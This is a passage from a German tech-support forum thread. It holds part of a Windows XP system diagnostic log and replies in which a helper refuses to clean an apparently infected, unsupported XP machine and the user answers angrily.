Sicherheitsupdate für Windows XP (KB924667) (HKLM\...\KB924667) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB925902) (HKLM\...\KB925902) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB926255) (HKLM\...\KB926255) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB926436) (HKLM\...\KB926436) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB927779) (HKLM\...\KB927779) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB927802) (HKLM\...\KB927802) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB928255) (HKLM\...\KB928255) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB928843) (HKLM\...\KB928843) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB929123) (HKLM\...\KB929123) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB930178) (HKLM\...\KB930178) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB931261) (HKLM\...\KB931261) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB931784) (HKLM\...\KB931784) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB932168) (HKLM\...\KB932168) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB933729) (HKLM\...\KB933729) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB935839) (HKLM\...\KB935839) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB935840) (HKLM\...\KB935840) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB936021) (HKLM\...\KB936021) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB938127) (HKLM\...\KB938127) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB938829) (HKLM\...\KB938829) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB939653) (HKLM\...\KB939653) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB941202) (HKLM\...\KB941202) (Version: 1 - Microsoft Corporation)
Skinamp for Winamp 2.x (remove only) (HKLM\...\Skinamp) (Version: - )
Update für Windows XP (KB894391) (HKLM\...\KB894391) (Version: 1 - Microsoft Corporation)
Update für Windows XP (KB898461) (HKLM\...\KB898461) (Version: 1 - Microsoft Corporation)
Update für Windows XP (KB900485) (HKLM\...\KB900485) (Version: 2 - Microsoft Corporation)
Update für Windows XP (KB908531) (HKLM\...\KB908531) (Version: 2 - Microsoft Corporation)
Update für Windows XP (KB910437) (HKLM\...\KB910437) (Version: 1 - Microsoft Corporation)
Update für Windows XP (KB911164) (Version: 1 - Microsoft Corporation) Hidden
Update für Windows XP (KB911280) (HKLM\...\KB911280) (Version: 2 - Microsoft Corporation)
Update für Windows XP (KB916595) (HKLM\...\KB916595) (Version: 1 - Microsoft Corporation)
Update für Windows XP (KB920872) (HKLM\...\KB920872) (Version: 1 - Microsoft Corporation)
Update für Windows XP (KB922582) (HKLM\...\KB922582) (Version: 1 - Microsoft Corporation)
Update für Windows XP (KB930916) (HKLM\...\KB930916) (Version: 1 - Microsoft Corporation)
Update für Windows XP (KB933360) (HKLM\...\KB933360) (Version: 1 - Microsoft Corporation)
Update für Windows XP (KB938828) (HKLM\...\KB938828) (Version: 1 - Microsoft Corporation)
VLC media player 1.1.4 (HKLM\...\VLC media player) (Version: 1.1.4 - VideoLAN)
WebFldrs XP (Version: 9.50.7523 - Microsoft Corporation) Hidden
Winamp (remove only) (HKLM\...\Winamp) (Version: - )
Windows Imaging Component (HKLM\...\WIC) (Version: 3.0.0.0 - Microsoft Corporation)
Windows Installer 3.1 (KB893803) (HKLM\...\KB893803v2) (Version: 3.1 - Microsoft Corporation)
Windows Media Format 11 runtime (HKLM\...\Windows Media Format Runtime) (Version: - )
Windows Media Player 11 (HKLM\...\Windows Media Player) (Version: - )
Windows XP-Hotfix - KB873339 (HKLM\...\KB873339) (Version: 20041117.092459 - Microsoft Corporation)
Windows XP-Hotfix - KB885835 (HKLM\...\KB885835) (Version: 20041027.181713 - Microsoft Corporation)
Windows XP-Hotfix - KB885836 (HKLM\...\KB885836) (Version: 20041028.173203 - Microsoft Corporation)
Windows XP-Hotfix - KB886185 (HKLM\...\KB886185) (Version: 20041021.090540 - Microsoft Corporation)
Windows XP-Hotfix - KB888302 (HKLM\...\KB888302) (Version: 20041207.111426 - Microsoft Corporation)
Windows XP-Hotfix - KB890859 (HKLM\...\KB890859) (Version: 1 - Microsoft Corporation)
Windows XP-Hotfix - KB891781 (HKLM\...\KB891781) (Version: 20050110.165439 - Microsoft Corporation)
Windows-Treiberpaket - Advanced Micro Devices (AmdK8) Processor (05/27/2006 1.3.2.0) (HKLM\...\3B18191663CDFABAA2A93D4267E54D683153FF60) (Version: 05/27/2006 1.3.2.0 - Advanced Micro Devices)
WinRAR archiver (HKLM\...\WinRAR archiver) (Version: - )
Xilisoft DPG Converter 6 (HKLM\...\Xilisoft DPG Converter 6) (Version: 6.5.2.0216 - Xilisoft)
XviD MPEG-4 Video Codec (HKLM\...\XviD_is1) (Version: XviD-1.0.3-20122004 - XviD Team (Koepi))
==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)
==================== Verknüpfungen =============================
(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)
==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============
2007-11-06 16:26 - 2002-05-14 19:22 - 00122880 _____ () C:\Programme\WinRAR\rarext.dll
2005-07-22 09:21 - 2005-07-22 09:21 - 00032768 _____ () C:\Programme\MP3 Player Utilities 4.00\AMVConverter\AmvTransform.dll
2006-08-16 09:35 - 2006-08-16 09:35 - 00196608 _____ () C:\WINDOWS\system32\nvapi.dll
==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)
AlternateDataStreams: C:\Dokumente und Einstellungen\*:zylomtest [0]
AlternateDataStreams: C:\Dokumente und Einstellungen\*:zylomtr{00013KEU-UKQE-K6V0-QFBF-26K1JL6KQVVO} [36]
AlternateDataStreams: C:\Dokumente und Einstellungen\*:zylomtr{000HQ7FF-AD7A-3FG3-VK8A-25GG67KOIVUV} [36]
AlternateDataStreams: C:\Dokumente und Einstellungen\*:zylomtr{000HQ7FF-AD7A-3FG5-2RU1-26ST3MUECVUP} [36]
AlternateDataStreams: C:\Dokumente und Einstellungen\*:zylomtr{000HQ7FF-AD7A-3FG5-2RU1-26ST3MUECVVO} [36]
AlternateDataStreams: C:\Dokumente und Einstellungen\*:zylomtr{000HQ7FF-AD7A-3FG5-8A6T-26VOTC6OMVND} [38]
==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)
==================== Verknüpfungen (Nicht auf der Ausnahmeliste) ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)
==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)
==================== Hosts Inhalt: ===============================
(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)
2006-02-28 14:00 - 2006-02-28 14:00 - 00000820 _____ C:\WINDOWS\system32\Drivers\etc\hosts
127.0.0.1 localhost
==================== Andere Bereiche ============================
(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)
HKU\S-1-5-21-343818398-162531612-839522115-1004\Control Panel\Desktop\\Wallpaper -> C:\Dokumente und Einstellungen\*\Anwendungsdaten\IrfanView\IrfanView_Wallpaper.bmp
DNS Servers: 217.0.43.97 - 217.0.43.113
Windows Firewall ist aktiviert.
==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==
==================== FirewallRules (Nicht auf der Ausnahmeliste) ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
DomainProfile\AuthorizedApplications: [%windir%\explorer.exe] =>
StandardProfile\AuthorizedApplications: [%windir%\explorer.exe] =>
DomainProfile\GloballyOpenPorts: [139:TCP] => Enabled:@xpsp2res.dll,-22004
DomainProfile\GloballyOpenPorts: [445:TCP] => Disabled:@xpsp2res.dll,-22005
DomainProfile\GloballyOpenPorts: [137:UDP] => Enabled:@xpsp2res.dll,-22001
DomainProfile\GloballyOpenPorts: [138:UDP] => Enabled:@xpsp2res.dll,-22002
DomainProfile\GloballyOpenPorts: [445:UDP] => Disabled:445
StandardProfile\GloballyOpenPorts: [1900:UDP] => :LocalSubNet:Enabled:@xpsp2res.dll,-22007
StandardProfile\GloballyOpenPorts: [2869:TCP] => :LocalSubNet:Enabled:@xpsp2res.dll,-22008
StandardProfile\GloballyOpenPorts: [139:TCP] => :LocalSubNet:Enabled:@xpsp2res.dll,-22004
StandardProfile\GloballyOpenPorts: [445:TCP] => Disabled:@xpsp2res.dll,-22005
StandardProfile\GloballyOpenPorts: [137:UDP] => :LocalSubNet:Enabled:@xpsp2res.dll,-22001
StandardProfile\GloballyOpenPorts: [138:UDP] => :LocalSubNet:Enabled:@xpsp2res.dll,-22002
StandardProfile\GloballyOpenPorts: [1:TCP] => :111.111.111.111/255.255.255.255:Disabled:ahpobx
==================== Fehlerhafte Geräte im Gerätemanager =============
Name: Microsoft PS/2-Maus
Description: Microsoft PS/2-Maus
Class Guid: {4D36E96F-E325-11CE-BFC1-08002BE10318}
Manufacturer: Microsoft
Service: i8042prt
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.
==================== Fehlereinträge in der Ereignisanzeige: =========================
Applikationsfehler:
==================
Error: (05/23/2017 10:51:33 AM) (Source: crypt32) (EventID: 8) (User: )
Description: Der automatische Aktualisierungsabruf der Drittanbieterstammlisten-Sequenznummer von <hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootseq.txt> ist fehlgeschlagen mit dem Fehler: Der Servername oder die Serveradresse konnte nicht verarbeitet werden.
.
Error: (05/21/2017 02:15:37 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Fehlgeschlagene Anwendung , Version 0.0.0.0, fehlgeschlagenes Modul unknown, Version 0.0.0.0, Fehleradresse 0x00000000.
Das medienspezifische Ereignis für [!ws!] wird verarbeitet.
Error: (05/21/2017 01:16:13 AM) (Source: nssm) (EventID: 1010) (User: )
Description: Event-ID 1010
Error: (09/04/2016 12:57:12 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Fehlgeschlagene Anwendung wmplayer.exe, Version 11.0.5721.5145, fehlgeschlagenes Modul splitter.ax, Version 1.10.262.12, Fehleradresse 0x000081b4.
Das medienspezifische Ereignis für [wmplayer.exe!ws!] wird verarbeitet.
Error: (02/21/2016 12:27:59 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Fehlgeschlagene Anwendung wmplayer.exe, Version 11.0.5721.5145, fehlgeschlagenes Modul vsfilter.dll, Version 2.40.2677.0, Fehleradresse 0x0002788a.
Das medienspezifische Ereignis für [wmplayer.exe!ws!] wird verarbeitet.
Error: (12/20/2015 06:18:52 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Fehlgeschlagene Anwendung excel.exe, Version 8.0.0.3612, fehlgeschlagenes Modul excel.exe, Version 8.0.0.3612, Fehleradresse 0x001fad17.
Das medienspezifische Ereignis für [excel.exe!ws!] wird verarbeitet.
Error: (09/27/2015 10:07:21 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Fehlgeschlagene Anwendung plugin-container.exe, Version 39.0.3.5696, fehlgeschlagenes Modul mozalloc.dll, Version 39.0.3.5696, Fehleradresse 0x00001aa1.
Das medienspezifische Ereignis für [plugin-container.exe!ws!] wird verarbeitet.
Error: (09/12/2015 08:34:22 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Fehlgeschlagene Anwendung wmplayer.exe, Version 11.0.5721.5145, fehlgeschlagenes Modul ffmpegmt.dll, Version 0.0.0.0, Fehleradresse 0x0004b12b.
Das medienspezifische Ereignis für [wmplayer.exe!ws!] wird verarbeitet.
Error: (08/01/2015 03:40:38 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Fehlgeschlagene Anwendung wmplayer.exe, Version 11.0.5721.5145, fehlgeschlagenes Modul ffmpegmt.dll, Version 0.0.0.0, Fehleradresse 0x0004b12b.
Das medienspezifische Ereignis für [wmplayer.exe!ws!] wird verarbeitet.
Error: (07/13/2015 01:32:08 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Fehlgeschlagene Anwendung wmplayer.exe, Version 11.0.5721.5145, fehlgeschlagenes Modul vsfilter.dll, Version 2.40.2677.0, Fehleradresse 0x00042279.
Das medienspezifische Ereignis für [wmplayer.exe!ws!] wird verarbeitet.
Systemfehler:
=============
Error: (05/23/2017 09:47:34 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "System Installer" wurde mit folgendem Fehler beendet:
Eine DLL-Initialisierungsroutine ist fehlgeschlagen.
Error: (05/23/2017 09:47:34 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "ServiceMt" wurde aufgrund folgenden Fehlers nicht gestartet:
Das System kann den angegebenen Pfad nicht finden.
Error: (05/23/2017 04:06:10 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "Windows Installer" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.
Error: (05/23/2017 04:02:11 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "Anwendungsverwaltung" wurde mit folgendem Fehler beendet:
Das angegebene Modul wurde nicht gefunden.
Error: (05/23/2017 04:02:11 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "Anwendungsverwaltung" wurde mit folgendem Fehler beendet:
Das angegebene Modul wurde nicht gefunden.
Error: (05/23/2017 04:02:10 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "Anwendungsverwaltung" wurde mit folgendem Fehler beendet:
Das angegebene Modul wurde nicht gefunden.
Error: (05/23/2017 04:02:10 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "Anwendungsverwaltung" wurde mit folgendem Fehler beendet:
Das angegebene Modul wurde nicht gefunden.
Error: (05/23/2017 04:02:10 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "Anwendungsverwaltung" wurde mit folgendem Fehler beendet:
Das angegebene Modul wurde nicht gefunden.
Error: (05/23/2017 04:02:10 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "Anwendungsverwaltung" wurde mit folgendem Fehler beendet:
Das angegebene Modul wurde nicht gefunden.
Error: (05/23/2017 04:02:10 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "Anwendungsverwaltung" wurde mit folgendem Fehler beendet:
Das angegebene Modul wurde nicht gefunden.
==================== Memory info ===========================
Processor: AMD Athlon(tm) 64 X2 Dual Core Processor 4200+
Prozentuale Nutzung des RAM: 60%
Installierter physikalischer RAM: 959.36 MB
Verfügbarer physikalischer RAM: 378.54 MB
Summe virtueller Speicher: 2315.38 MB
Verfügbarer virtueller Speicher: 1835.79 MB
==================== Laufwerke ================================
Drive c: (*) (Fixed) (Total:58.59 GB) (Free:8.26 GB) NTFS ==>[Laufwerk mit Startkomponenten (Windows XP)]
Drive d: (*) (Fixed) (Total:48.83 GB) (Free:0.35 GB) NTFS
Drive e: (*) (Fixed) (Total:41.62 GB) (Free:0.08 GB) NTFS
==================== MBR & Partitionstabelle ==================
========================================================
Disk: 0 (Size: 149.1 GB) (Disk ID: 74BC26AE)
Partition 1: (Active) - (Size=58.6 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=90.4 GB) - (Type=OF Extended)
==================== Ende vom Addition.txt ============================
|
|
23.05.2017, 12:57
| #7 | ||
| /// Winkelfunktion /// TB-Süch-Tiger™ | ActiveXObject Scrip Virus - Name: fuckyoumm2_consumerZitat:
Microsoft gibt dafür seit drei Jahren keinen Support mehr. Das wirst du auch in den Medien gesehen haben. Du wirst dieses System so nie wieder sicher betreiben können. Nimm die Kiste vom Netz und fertig. Zitat:
__________________ Logfiles bitte immer in CODE-Tags posten |
|
23.05.2017, 13:00
| #8 |
| | ActiveXObject Scrip Virus - Name: fuckyoumm2_consumer Ja ich weiß er ist alt... trotzdem... bitte... Könntest du wenigstens einen kurzen Blick auf die Logs werfen... |
|
23.05.2017, 13:02
| #9 |
| /// Winkelfunktion /// TB-Süch-Tiger™ |  ActiveXObject Scrip Virus - Name: fuckyoumm2_consumer Ja das hab ich doch schon getan. Du musst begreifen, dass eine Bereinigung hier nix mehr bringt. Auch eine Neuinstallation hilft bei XP so nicht weiter v.a. wenn du mit dieser Kiste ins Internet gehst. XP ist schon vor drei Jahren gestorben.
__________________ Logfiles bitte immer in CODE-Tags posten |
|
23.05.2017, 13:09
| #10 |
| | ActiveXObject Scrip Virus - Name: fuckyoumm2_consumer Ich hoffe hier gibt es noch andere Leute die mir BITTE helfen können. Kein Arschloch der Geld scheißt und denkt jeder kann sich das neuste vom neuen leisten. |
|
23.05.2017, 13:14
| #11 |
| /// Winkelfunktion /// TB-Süch-Tiger™ | ActiveXObject Scrip Virus - Name: fuckyoumm2_consumer Jedes mal die gleichen depperten Ausreden bei XP-Usern   Du willst nicht begreifen, dass es keine Lösung für Windows XP mehr gibt! Außer den Stecker zu ziehen und somit offline zu bleiben! Und es steht auch nirgends in meinen Beiträgen, dass du die allerneuste und teuerste Hardware jetzt kaufen musst, also hör auf so ne Kacke zu erzählen! Allerdings muss man damit rechnen den Anschluss zu verlieren wenn man so wie du mit über zehn Jahre Hardware herumkrebst. Das einzige was du noch machen kannst ist diese Kiste sauber eu zu installieren, dann reicht ein SP3 ohne weitere Updates da du ja damit eh nicht mehr ins Internet darfst. Aber bereinigt wird hier so ein System nicht mehr. 
__________________ Logfiles bitte immer in CODE-Tags posten |
|
| Themen zu ActiveXObject Scrip Virus - Name: fuckyoumm2_consumer |
| .dll, antivirus, code, datei, dll, fehler, firewall, log, löschen, neustart, nicht mehr, recovery, rundll, rundll32.exe, scan, script, seite, seiten, system32, tan, virus, win32, windows, windows firewall, wmi |
Linear-Darstellung
